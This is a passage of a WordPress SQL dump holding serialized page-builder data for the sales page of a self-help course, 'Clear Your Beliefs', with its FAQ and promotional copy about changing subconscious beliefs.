You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1572, 2022, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and 